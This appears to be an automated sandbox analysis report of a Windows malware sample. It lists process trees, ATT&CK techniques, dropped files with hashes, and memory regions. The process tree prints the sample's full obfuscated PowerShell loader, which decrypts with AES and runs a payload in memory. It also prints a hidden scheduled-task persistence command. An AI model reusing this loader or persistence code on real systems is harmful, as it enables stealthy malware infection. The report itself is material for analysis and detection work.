1⤵
PID:3404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:3956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4612

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:948

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:1208

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:1288

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\conhost.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:1620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtgTNLQD917Z3OfAalN5p6ncKCNzsah2L8s5ejdS+dc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jnVmcutmPup+V829XIUyUQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $EAIzG=New-Object System.IO.MemoryStream(,$param_var); $allpB=New-Object System.IO.MemoryStream; $qQadD=New-Object System.IO.Compression.GZipStream($EAIzG, [IO.Compression.CompressionMode]::Decompress); $qQadD.CopyTo($allpB); $qQadD.Dispose(); $EAIzG.Dispose(); $allpB.Dispose(); $allpB.ToArray();}function execute_function($param_var,$param2_var){ $EsoDJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XgHWj=$EsoDJ.EntryPoint; $XgHWj.Invoke($null, $param2_var);}$MwOvg = 'C:\Users\Admin\AppData\Local\conhost.bat';$host.UI.RawUI.WindowTitle = $MwOvg;$kBJQu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($MwOvg).Split([Environment]::NewLine);foreach ($QatGk in $kBJQu) { if ($QatGk.StartsWith('vwDuqbmIlgDgjzMkEVvn')) { $STSYE=$QatGk.Substring(20); break; }}$payloads_var=[string[]]$STSYE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
  2⤵
  PID:1796
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2440
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_704_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_704.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1660
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_704.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3716
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_704.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2400
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtgTNLQD917Z3OfAalN5p6ncKCNzsah2L8s5ejdS+dc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jnVmcutmPup+V829XIUyUQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $EAIzG=New-Object System.IO.MemoryStream(,$param_var); $allpB=New-Object System.IO.MemoryStream; $qQadD=New-Object System.IO.Compression.GZipStream($EAIzG, [IO.Compression.CompressionMode]::Decompress); $qQadD.CopyTo($allpB); $qQadD.Dispose(); $EAIzG.Dispose(); $allpB.Dispose(); $allpB.ToArray();}function execute_function($param_var,$param2_var){ $EsoDJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XgHWj=$EsoDJ.EntryPoint; $XgHWj.Invoke($null, $param2_var);}$MwOvg = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_704.bat';$host.UI.RawUI.WindowTitle = $MwOvg;$kBJQu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($MwOvg).Split([Environment]::NewLine);foreach ($QatGk in $kBJQu) { if ($QatGk.StartsWith('vwDuqbmIlgDgjzMkEVvn')) { $STSYE=$QatGk.Substring(20); break; }}$payloads_var=[string[]]$STSYE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        5⤵
        
        PID:2412
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3284

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:2096

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
5f4c933102a824f41e258078e34165a7

SHA1
d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

SHA256
d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

SHA512
a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
62KB

MD5
e566632d8956997225be604d026c9b39

SHA1
94a9aade75fffc63ed71404b630eca41d3ce130e

SHA256
b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0

SHA512
f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
1KB

MD5
c7762c38ef3a977644500a3cb9a3e8e8

SHA1
78734bf37c35207069b85f1b5c562d1436fd72a3

SHA256
2f92b3e5c45ff26043c6d375105757af1588a127b9df39ebfb24043e0a29b541

SHA512
7b2674b77ec2f6f89bd75a3577e291fd715787e3d67f52a255f560269a470007a22d2387a8c7042047bbb029f116d7292508486c0ed0e3092250dfc62e2737aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
1KB

MD5
a368077f7f3f74b0b29d33ff9adb1bd2

SHA1
f936e29ee0a9bedde702ce85dc1b60d4082ce810

SHA256
3b129f7c1fd7c3a866b96a461c8d004e45e09f1ce77919ec4ae934cd12a9356f

SHA512
d1fb853bc40a8f69a8b23888470105238778799cad8a118a009079e0c1dd2933f23cbf52caa422bfc0602dcce5ff1b6aea6f7a151f03bfc5b95bf2de7b30ecca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
1KB

MD5
de93b80ef71a674472f23017d102a914

SHA1
e2320d1fd40056ca4c30e6007357df1b43be4b2b

SHA256
d740d9fd7cc5c16f6e1d699d1cc3f56d62a15557e1880d5ec63e6a01b3151e8f

SHA512
6d8e8efc8f50f70d4ae88186818b51395decb79d4fdda268d6fae4510aea644dc39268e0799588ba544fab6e12df8241e9eb0949f064e24ef41fcfd87091e7cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
1KB

MD5
ffb5b614fa93333cd9317e168f13e9c0

SHA1
ef8fb9776eee829799bc149ea5130bde3d8ac962

SHA256
b58f0822626c710785f9876b663574eff7584d0dfb832b9488c0a8fae8018f52

SHA512
3156bcde54950ddc48e7791866ef0482185652b6fb9445f4790cc1101fd08c15e8d7b160f7df0916653bec4d48e9bc80c47862ef0f6867d5ad416684ab1605a2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2f8f22fd5d2b19935f8a6268fabe255c

SHA1
fea7116a5e56c501439fa0261d2c89564c939a1b

SHA256
c3129137313ae7bd0bc8b22bd043708e9890398876608f45c0ad33108a41d5c2

SHA512
2f5af078f6ec28116349e1dc4c05b4d6dc9bdcbe4f28bbeb0f43e1492a8a1aaaff074f4ea2a8119c3ea728c15ae721ecdaafad1d6a1edda208ee5dbc16b347ec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f65feb0fbbd0fcb9da91d117a38e4f31

SHA1
95b1256dd050df6d555a4d06d4dc7ac542b6a070

SHA256
cb0bff45abfcccadc000e77840ccf5004ae4197a8d98baab877e6e9c238bba0c

SHA512
0715ba19e75a60eeb6cf98f4bc80980f1f1e681bd69d3ce242bf1c50787b82eb99064de0c0753c4259dcc8837a65ac2b7c84b3c1f114200cb252c05e448b1776

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_stujxo54.uny.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\conhost.bat

Filesize
274KB

MD5
e19333732c953dccd21bd997320a7a53

SHA1
93462b009375d7bb5434843b871dc439c9b8555d

SHA256
0556c1dcf0f0928084b9067e210e8b72c79dd02831b70a4f4e81c4e3298ff3d9

SHA512
cde6e8475e5433d51a9f2fb2db3cbf46e86089392344da43e194c3da90005597a56140cd580a2c6edfbcde9a95618c1233160d1ff79d049efcbdad62ee06bdf3

Download Submit
C:\Users\Admin\AppData\Local\dllhost.bat

Filesize
83KB

MD5
fc1bd57fa57b7b5c512746c7de3fa19a

SHA1
7f794e6459def2dcc346d562aacca372e7282270

SHA256
8977812b16f1e3d827cbce1675d9ad9e2f0370cf27cb3b23b389594739c3b837

SHA512
71a1908e1625c9ef28c5a85ca21dfdadcebfc4ae41b21ba2d11a92e1192a49a819adde6fb30fb9f2e8f4199a264c56e86f9d21a67704f7b25b8dbdd9c43b07d9

Download Submit
C:\Users\Admin\AppData\Local\svchost.bat

Filesize
304KB

MD5
74f5686e51d07dab9f43f62081f83003

SHA1
8d6b22e17db345f43ec3db13748c162d3cd1b229

SHA256
52974d82b405f9ebba25b6de26cbf2c59f4ec9e4d6c7059661f9f2f02e29d03e

SHA512
5865a681a5e9b3464351a4d9e5bf18dccf3ed43f288c388decfa8559e496c67a563acadd8b7563e4004fe320298b47842a5a672552f14a95772460f54f782384

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_704.vbs

Filesize
124B

MD5
a334fb0b1ea7f6e723913660c19afd4f

SHA1
723993f0d6c5dcfe6d0e2540d35f1f4b3b6c40c0

SHA256
5ee010dca2b862dc19a355da2c8e0fde0c93719c2156db2e4c3cbc25eb44b8ac

SHA512
cb5482f5b87e574bba99023c287673035b9e013cd4d87f9795daa6f7930bad7a00e9b762f26de013b8b00ae66a8955286d52f6aca2841d59ddfb7c0ba17429c5

Download Submit
C:\Users\Admin\AppData\Roaming\$svchost_424.vbs

Filesize
112B

MD5
b019d31d7576ad191fe25effc08fbd3d

SHA1
43ac2bfa441e9e27ea007655f1770eddcc3a1786

SHA256
36a1454e5ef92a33dc07868d8674c40920eb9c71aa0be7c0fcfdf12bf16c2be4

SHA512
c385f23c3d481ba4781a2c851beb405b6ccb9a40711609c026be99bc526c0ff7a586e4442d75ab0411f7397f82a01816041dff33cd385577ad5873d9f9d2bc29

Download Submit
memory/1196-149-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp

Filesize
64KB

Download
memory/1208-146-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp

Filesize
64KB

Download
memory/1352-148-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp

Filesize
64KB

Download
memory/1600-143-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp

Filesize
64KB

Download
memory/1652-139-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp

Filesize
64KB

Download
memory/1752-140-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp

Filesize
64KB

Download
memory/1948-147-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp

Filesize
64KB

Download
memory/2096-142-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp

Filesize
64KB

Download
memory/2440-58-0x0000029EF2460000-0x0000029EF2468000-memory.dmp

Filesize
32KB

Download
memory/2440-59-0x0000029EF2650000-0x0000029EF2686000-memory.dmp

Filesize
216KB

Download
memory/2664-144-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp

Filesize
64KB

Download
memory/2672-13-0x0000022FAC390000-0x0000022FAC3D6000-memory.dmp

Filesize
280KB

Download
memory/2672-0-0x00007FF991AE3000-0x00007FF991AE5000-memory.dmp

Filesize
8KB

Download
memory/2672-11-0x00007FF991AE0000-0x00007FF9925A2000-memory.dmp

Filesize
10.8MB

Download
memory/2672-14-0x0000022FABEB0000-0x0000022FABEB8000-memory.dmp

Filesize
32KB

Download
memory/2672-15-0x0000022FAC3E0000-0x0000022FAC4B2000-memory.dmp

Filesize
840KB

Download
memory/2672-1-0x0000022FABDF0000-0x0000022FABE12000-memory.dmp

Filesize
136KB

Download
memory/2672-10-0x00007FF991AE0000-0x00007FF9925A2000-memory.dmp

Filesize
10.8MB

Download
memory/2672-12-0x00007FF991AE0000-0x00007FF9925A2000-memory.dmp

Filesize
10.8MB

Download
memory/2672-23-0x00007FF991AE0000-0x00007FF9925A2000-memory.dmp

Filesize
10.8MB

Download
memory/2672-16-0x0000022FAC4B0000-0x0000022FAC580000-memory.dmp

Filesize
832KB

Download
memory/2844-137-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp

Filesize
64KB

Download
memory/3188-47-0x000001BD80030000-0x000001BD80042000-memory.dmp

Filesize
72KB

Download
memory/3188-46-0x000001BD80020000-0x000001BD80028000-memory.dmp

Filesize
32KB

Download
memory/3188-48-0x000001BDE7780000-0x000001BDE8780000-memory.dmp

Filesize
16.0MB

Download
memory/3200-87-0x0000000003290000-0x00000000032BA000-memory.dmp

Filesize
168KB

Download
memory/3200-136-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp

Filesize
64KB

Download
memory/3284-185-0x0000020E7EFD0000-0x0000020E7EFDE000-memory.dmp

Filesize
56KB

Download
memory/3404-145-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp

Filesize
64KB

Download
memory/3720-141-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp

Filesize
64KB

Download
memory/4612-138-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp

Filesize
64KB

Download
memory/4864-198-0x0000021673C80000-0x0000021673CBC000-memory.dmp

Filesize
240KB

Download
memory/4864-197-0x00000216739C0000-0x00000216739C8000-memory.dmp

Filesize
32KB

Download
memory/4980-210-0x00007FF991AE0000-0x00007FF9925A2000-memory.dmp

Filesize
10.8MB

Download
memory/4980-25-0x00007FF991AE0000-0x00007FF9925A2000-memory.dmp

Filesize
10.8MB

Download
memory/4980-26-0x00007FF991AE0000-0x00007FF9925A2000-memory.dmp

Filesize
10.8MB

Download